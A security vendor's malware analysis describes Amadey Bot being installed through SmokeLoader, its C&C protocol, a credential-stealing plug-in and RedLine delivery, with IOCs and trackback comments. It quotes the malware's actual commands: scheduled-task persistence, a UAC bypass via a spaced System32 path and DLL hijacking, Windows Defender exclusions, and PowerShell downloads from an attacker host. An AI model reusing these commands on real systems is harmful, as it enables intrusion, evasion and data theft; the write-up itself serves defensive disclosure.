Amadey Bot Being Distributed Through SmokeLoader

Amadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker. Like other malware strains, it has been sold in illegal forums and used by various attackers.

The ASEC analysis team previously revealed cases where Amadey was used on attacks in the ASEC blog posted in 2019 (English version unavailable). Amadey was mainly used to install ransomware by attackers of GandCrab or to install FlawedAmmyy by the TA505 group that is infamous for Clop ransomware. The attackers of Fallout Exploit Kit and Rig Exploit Kit are also known for using Amadey.

The team has recently discovered that Amadey is being installed by SmokeLoader. SmokeLoader is a malware that has continuously been distributed during the last few years, taking up high proportion in the recent ASEC statistics. It is recently distributed by having users download the malware that is disguised as software cracks and serial generation programs from websites for distribution.

SmokeLoader provides various additional features related to info-stealing as plug-ins. It is normally used to install additional malware strains as a downloader. When SmokeLoader is run, it injects Main Bot into the currently running explorer process (explorer.exe). This means Bot that performs actual malicious behaviors operates inside the explorer process. The figure below shows AhnLab’s ASD log of SmokeLoader, which has been injected into explorer, downloading Amadey.

Figure 1. Amadey downloaded through SmokeLoader injected into the explorer process

When Amadey is run, it first copies itself to the Temp path below. Then, Amadey registers the folder where it exists as a startup folder to allow itself to be run after reboot. It also provides a feature to register itself to Task Scheduler to maintain persistence.

Amadey Installation Path
> %TEMP%\9487d68b99\bguuwe.exe

Command registered to Task Scheduler
> cmd.exe /C REG ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders” /f /v Startup /t REG_SZ /d %TEMP%\9487d68b99\
> schtasks.exe /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR “%TEMP%\9487d68b99\bguuwe.exe” /
F

Figure 2. Amadey shown on AhnLab’s ASD log

After going through the process mentioned above, the malware starts communicating with the C&C server. The following Fiddler log shows Amadey communicating with the C&C server, downloading the cred.dll plug-in to collect user environment information and send aos매to the C&C server, and installing RedLine info-stealer as an additional malware strain.

Figure 3. Amadey’s network traffic

The malware collects the information of the infected system before it connects to the C&C server. The information collected includes basic information such as computer name and user name, as well as a list of installed anti-malware products. Each part of the collected information is sent to the C&C server in an appropriate format. The server then can send the URL of additional malware strains that Amadey will download to make it operate as a downloader.

Figure 4. Data sent to the C&C server and data received from the C&C server
ItemData ExampleMeaning
id129858768759Infected system’s ID
vs3.21Amadey version
sd37bbd7Amadey ID
os9Windows version
ex) Windows 7 – 9
Windows 10 – 1
Windows Server 2012 – 4
Windows Server 2019 – 16
bi0Architecture (x86 – 0, x64 – 1)
ar0Admin privilege status (1 if admin privilege is available)
pcPCNAMEComputer name
unUSERNAMEUser name
dmDOMAINNAMEDomain name
av0List of installed anti-malware
lv0Set as 0
og1Set as 1
Table 1. Data sent to the C&C server

The table above indicates that the current version of Amadey discussed in this post is 3.21. Accessing the C&C panel of the current Amadey version under analysis shows how the current version is slightly different from the previous one.

Figure 5. Previous Amadey C&C panel login page
Figure 6. Latest Amadey C&C panel login page

Among items sent to the C&C server, “av” refers to the information of anti-malware installed on the infected environment. Each number is assigned to a particular anti-malware product. As ’13’ is chosen if the infected environment is Windows 10 or Windows Server 2019, it is likely the number is reserved for Windows Defender.

Anti-malware NameNumber
X0
Avast Software1
Avira2
Kaspersky Lab3
ESET4
Panda Security5
Dr. Web6
AVG7
360 Total Security8
Bitdefender9
Norton10
Sophos11
Comodo12
Windows Defender (assumed)13
Table 2. List of anti-malware for checking

Amadey also periodically takes screenshots and sends them to the C&C server. It captures the current screen in a JPG format and saves it with the name “129858768759” in the %TEMP% path. The screenshot is later sent to the C&C server with the POST method.

Figure 7. Sending screenshots to the C&C server

The network traffic figure shown above has “cred.dll”, meaning the malware downloaded a plug-in for stealing information. The plug-in developed with the Delphi programming language is downloaded to the %APPDATA% path. It is then run through rundll32.exe as having the Export function Main() as an argument as shown below.

> rundll32.exe %APPDATA%\406d6c22b040c6\cred.dll, Main

The list of information that is stolen includes emails, FTPs, VPN clients, etc. The information collected is sent to the same C&C server.

List of information targeted for info-stealing plug-in
– Mikrotik Router Management Program Winbox
– Outlook
– FileZilla
– Pidgin
– Total Commander FTP Client
– RealVNC, TightVNC, TigerVNC
– WinSCP

The Fiddler log mentioned above shows how Amadey installed additional malware from “hxxp://185.17.0[.]52/yuri.exe” besides the cred.dll plug-in. When Amadey periodically communicates with the C&C server to send the information of the infected system, the server usually sends the NULL data back. However, it can send a downloader command depending on the command. The downloader command is sent with encoded data, and decoding it will allow the malware to receive an URL for downloading additional malware. The malware downloaded from the URL is RedLine info-stealer.

Figure 8. RedLine info-stealer being installed by Amadey

Accessing “hxxp://185.17.0[.]52/” shows a list of files.

Figure 9. A webpage for Amadey to download

The table below explains each file. They include Amadey, RedLine, and downloader malware types used to install them.

NameType
Proxy.exeAutoit downloader malware
a.exeAmadey (unpacked original version)
ama.exeAmadey (NULL data added to a.exe)
au.exeAmadey (packed)
binAmadey downloader (x64 DLL)
xyz.exeDownloader (installs bin)
yuri.exRedLine info-stealer
Table 3. List of malware strains

xyz.exe and bin, which are downloader malware types, are developed with the Rust programming language. xyz.exe downloads bin and supports privilege escalation using the UAC bypass technique. The technique exploits AutoElevate and the mechanisms of AIS. AutoElevate is a program with the “” property as shown below. If certain conditions are met, it can be run as admin privilege without a UAC pop-up.

Figure 10. FXSUNATD.exe with the AutoElevate property

To do so, the program needs to be run in a trusted location such as System32 besides the property mentioned above. Hence the malware created the “C:\Windows \System32\” folder as shown below and copied “FXSUNATD.exe” (AutoElevate program) to satisfy the condition. AIS ignores spacings when internally checking paths. So if “FXSUNATD.exe” is run in the path mentioned earlier, it is recognized as being executed from a normal System32 path. The path check is successful and the program is run as AutoElevate (admin privilege).

> powershell.exe “New-Item -ItemType Directory ‘\?\C:\Windows \System32’; Copy-Item -Path ‘C:\Windows\System32\FXSUNATD.exe’ -Destination ‘C:\Windows \System32\’; powershell -windowstyle hidden $ProgressPreference= ‘SilentlyContinue’; Invoke-WebRequest hxxp://185.17.0[.]52/bin -Outfile ‘C:\Windows \System32\version.dll'”

> powershell.exe “Start-Process ‘C:\Windows \System32\FXSUNATD.exe'”

The malware then downloads a malicious DLL named version.dll in the same path. version.dll is a DLL used by “FXSUNATD.exe”. If the file is in the same path as “FXSUNATD.exe”, the DLL is executed first following the DLL load order when the exe program is run. The process is called DLL hijacking. By exploiting this mechanic, the malware loaded on a normal program is executed as “FXSUNATD.exe” is run after the malicious DLL (version.dll) is created in the same path.

Figure 11. Process tree of Amadey downloader

bin (version.dll) loaded and executed by “FXSUNATD.exe” is a downloader that installs Amadey and RedLine. When it is run, it uses the Windows Defender command to register the %ALLUSERSPROFILE% folder and %LOCALAPPDATA% directory that includes the Temp directory as exclusions. It then downloads and runs each malware type.

> powershell -windowstyle hidden Add-MpPreference -ExclusionPath C:\ProgramData\; Add-MpPreference -ExclusionPath $env:TEMP\; Add-MpPreference -ExclusionPath $env:LOCALAPPDATA\

> powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/yuri.exe -OutFile $env:TEMP\msconfig.exe;

> powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/ama.exe -OutFile $env:TEMP\taskhost.exe

Initially distributed through exploit kits in the past, Amadey has been installed through SmokeLoader from malicious websites disguised as download pages for cracks and serials of commercial software until recently. Once the malware is installed, it can stay in the system to steal user information and download additional payloads. Users should apply the latest patch for OS and programs such as Internet browsers, and update V3 to the latest version to prevent malware infection in advance.

AhnLab’s anti-malware software, V3, detects and blocks the malware above using the aliases below.

[File Detection]
– Trojan/Win.MalPE.R503126 (2022.07.07.01)
– Trojan/Win.Amadey.C5196504 (2022.07.07.02)
– Trojan/Win.Delf.R462350 (2022.01.04.02)
– Trojan/Win.Generic.R503640 (2022.07.09.01)
– Downloader/Win.AutoIt.C5200737 (2022.07.11.00)
– Malware/Win.Trojanspy.R438708 (2021.08.25.01)
– Trojan/Win.Amadey.C5200739 (2022.07.11.00)
– Downloader/Win.Agent.C5198969 (2022.07.10.00)
– Downloader/Win.Agent.C5198968 (2022.07.10.00)

[Behavior Detection]
– Malware/MDP.Download.M1197
– Execution/MDP.Powershell.M2514

[IOC]
MD5

– c3b7cf4c76cc20e56b180b001535696f (SmokeLoader)
– 6a87b10b372f64f7890def6fbaf08bfc (bguuwe.exe: Amadey)
– 77ce635ba7fb55f0c844077fee828ce7 (cred.dll: Stealer Plugin)
– 0f4351c43a09cb581dc01fe0ec08ff83 (yuri.exe: RedLine)
– 600bb5535d0bfc047f5c61f892477045 (Proxy.exe: Autoit downloader)
– 18bb226e2739a3ed48a96f9f92c91359 (a.exe: Amadey – unpacked original version)
– 27f626db46fd22214c1eb6c63193d2a0 (ama.exe: Amadey – NULL data added to a.exe)
– 977697e93a3b2635a5b8fb7dc3dfaf6b (au.exe: Amadey – packed)
– f0cdfc42f1c1c0c2d9b518e5cb31c788 (bin: Amadey downloader – x64 DLL)
– 0fd121b4a221c7767bd58f49c3d7cda5 (xyz.exe: Downloader – installs bin)

Download URL
– hxxp://185.17.0[.]52/yala.exe (Amadey)
– hxxp://authymysexy[.]info/5Lsq3FR/Plugins/cred.dll (Stealer Plugin)
– hxxp://185.17.0[.]52/yuri.exe (RedLine)
– hxxp://185.17.0[.]52/Proxy.exe (Autoit downloader malware)
– hxxp://185.17.0[.]52/a.exe (Amadey – unpacked original version)
– hxxp://185.17.0[.]52/ama.exe (Amadey – NULL data added to a.exe)
– hxxp://185.17.0[.]52/au.exe (Amadey – packed)
– hxxp://185.17.0[.]52/bin (Amadey downloader – x64 DLL)
– hxxp://185.17.0[.]52/xyz.exe (Downloader – installs bin)

C2
– hxxp://host-file-host6[.]com (SmokeLoader)
– hxxp://host-host-file8[.]com (SmokeLoader)
– hxxp://teamfighttacticstools[.]info/5Lsq3FR/index.php (Amadey)
– hxxp://authymysexy[.]info/5Lsq3FR/index.php (Amadey)
– hxxp://nftmatrixed[.]info/5Lsq3FR/index.php (Amadey)
– 185.17.0[.]63:34397 (RedLine)

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 1 vote
Article Rating
guest
80 Comments
Inline Feedbacks
View all comments
trackback

[…] Amadey. However researchers at South Korea’s AhnLab lately noticed the brand new variant being installed on systems via SmokeLoader, a malware dropper that attackers have been utilizing since at the very least […]

trackback

[…] However researchers at South Korea’s AhnLab not too long ago noticed the brand new variant being put in on techniques through SmokeLoader, a malware dropper that attackers have been utilizing since at the least […]

trackback

[…] However researchers at South Korea’s AhnLab not too long ago noticed the brand new variant being put in on methods by way of SmokeLoader, a malware dropper that attackers have been utilizing since not less than […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] pesquisadores do AhnLab da Coréia do Sul descobriram recentemente que a nova variante está sendo instalada em sistemas via SmokeLoader , um dropper de malware que os invasores usam desde pelo menos […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] Amadey. However researchers at South Korea’s AhnLab lately noticed the brand new variant being put in on techniques through SmokeLoader, a malware dropper that attackers have been utilizing since no less than […]

trackback

[…] a steady decline in the prevalence of this malware. A new version of the virus has, however, been reported by the Korean researchers at […]

trackback

[…] a steady decline in the prevalence of this malware. A new version of the virus has, however, been reported by the Korean researchers at […]

trackback

[…] a steady decline in the prevalence of this malware. A new version of the virus has, however, been reported by the Korean researchers at […]

trackback

[…] within the occurrence of this malware. A brand new model of the virus has, on the other hand, been reported via the Korean researchers at […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] a steady decline in the prevalence of this malware. A new version of the virus has, however, been reported by the Korean researchers at […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] terjadi penurunan yang stabil dalam prevalensi malware ini. Namun, versi baru dari virus telah dilaporkan oleh para peneliti Korea di […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Safety Emergency Response Middle (ASEC) stated in a report printed final […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Safety Emergency Response Heart (ASEC) stated in a report printed final […]

trackback

[…] from AhnLab disclosed a brand new model of Amadey being unfold with SmokeLoader malware. Previous, the bot […]

trackback

[…] distribute Amadey. But researchers at South Korea’s AhnLab recently spotted the new variant being installed on systems via SmokeLoader, a malware dropper that attackers have been using since at least 2011. Researchers at AhnLab found […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last week.Amadey, a botnet that first appeared around October 2018 on Russian […]

trackback

[…] um declínio constante na prevalência desse malware. Uma nova versão do vírus, no entanto, foi relatada pelos pesquisadores coreanos do […]

trackback

[…] constante na prevalência desse malware. Uma nova versão do vírus, no entanto, foi relatada pelos pesquisadores coreanos do […]

trackback

[…] installed, it can stay in the system to steal user information and download additional payloads.” concludes the report. “Users should apply the latest patch for OS and programs such as Internet browsers, and update […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] Amadey Bot Being Distributed Through SmokeLoader […]

trackback

[…] to researchers, the malware steals information such as emails, FTPs, VPN clients, and so on. The […]

trackback

[…] AhnLab’s cybersecurity researchers have identified a new version of the Amadey Bot malware after a four-year hiatus. The latest iteration of Amadey ditches Rig exploit kits and Fallout for more efficient recon, penetration, and C2 features. According to the research team, SmokeLoader, the malware in charge of deploying Amadey on the victim’s machine, lands on the device with the user’s permission. In this case, the malware’s creators will lure in the users by disguising SmokeLoader into a keygen or a software crack. […]

trackback

[…] a steady decline in the prevalence of this malware. A new version of the virus has, however, been reported by the Korean researchers at […]